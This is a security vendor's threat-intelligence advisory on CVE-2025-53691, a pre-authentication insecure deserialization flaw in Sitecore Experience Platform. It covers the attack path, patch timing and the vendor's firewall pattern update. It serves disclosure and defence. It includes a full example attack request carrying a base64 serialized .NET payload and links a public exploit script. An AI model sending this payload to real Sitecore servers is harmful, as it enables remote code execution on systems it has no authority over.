[2025.10 Vulnerability Report] Sitecore Experience Platform Insecure Deserialization | SECaaS Platform AIONCLOUD

Threat Intelligence Report

Get up-to-date information on web application vulnerabilities, attacks, and how to respond.

Back to Threat Intelligence Report

[2025.10 Vulnerability Report] Sitecore Experience Platform Insecure Deserialization

This vulnerability is an insecure deserialization vulnerability in the Sitecore Experience Platform. An attacker could access classes that utilize deserialization under the /-/xaml/Sitecore.Shell path and execute serialized malicious code.

A patch for this vulnerability was released in July 2025, and AIWAF products will address this vulnerability through the “Sitecore Experience Platform Insecure Deserialization Remote Code Execution” pattern, which will be added in the October 2025 pattern update.

Tags: Sitecore, Sitecore Experience Platform, Sitecore Experience Managet, Insecure Deserialization, CVE-2025-53691, Remote Code Execution

1. Overview

Sitecore Experience Platform is a content management system (CMS) offered to enterprises, and is used to manage content creation and distribution.

In this report, we have summarized the analysis of the vulnerability CVE-2025-53691 that occurred in the platform.

image.png

Source: https://www.sitecore.com/products/experience-manager

2. Attack type

CVE-2025-53691 is a Pre-Auth RCE vulnerability publicly disclosed in late August 2025, and the watchtowr team has released a detailed analysis of the vulnerability.

Sitecore exposes various HTTP handlers, among which the /-/xaml/ path allows loading classes defined within the service.

Therefore, an attacker can send serialized malicious code via the __PARAMETERS parameter to a class that supports deserialization under /-/xaml/Sitecore.Shell, and execute it.

According to the GitHub PoC by XiaomingX, a total of four classes appear to be used in the attack.

image.png

Source: https://github.com/XiaomingX/data-cve-poc/blob/main/2025/CVE-2025-53691/exploit.py

Example attack request:

POST /-/xaml/Sitecore.Shell.Applications.Dialogs.ItemLister.ItemLister HTTP/1.1
Content-Length: 431
Content-Type: application/x-www-form-urlencoded
Host: www.test.com
User-Agent: HTTPie

__SOURCE=ItemLister&__PARAMETERS={"method":"ProcessSerializedData","parameters":
["AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg
1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAd2hvYW1pCwA="]}


3. Mitigation

This vulnerability was recognized by Sitecore around February 2025, and a security patch to address it was released in July 2025.

Our AIWAF will respond with the upcoming pattern update “Sitecore Experience Platform Insecure Deserialization Remote Code Execution”.

image.png

Source: https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667

4. Conclusion

Sitecore Experience Platform is a content management system provided to enterprises, and the CVE-2025-53691 vulnerability in the service is expected to be actively exploited because detailed analysis information and exploit information have been published. Customers using the platform must quickly patch to the latest version.

Our TA team monitors vulnerabilities in Sitecore products and will promptly respond to any related vulnerabilities discovered in the future.

5. References

https://nvd.nist.gov/vuln/detail/CVE-2025-53691
https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/
https://github.com/XiaomingX/data-cve-poc/blob/main/2025/CVE-2025-53691/exploit.py
Scroll Up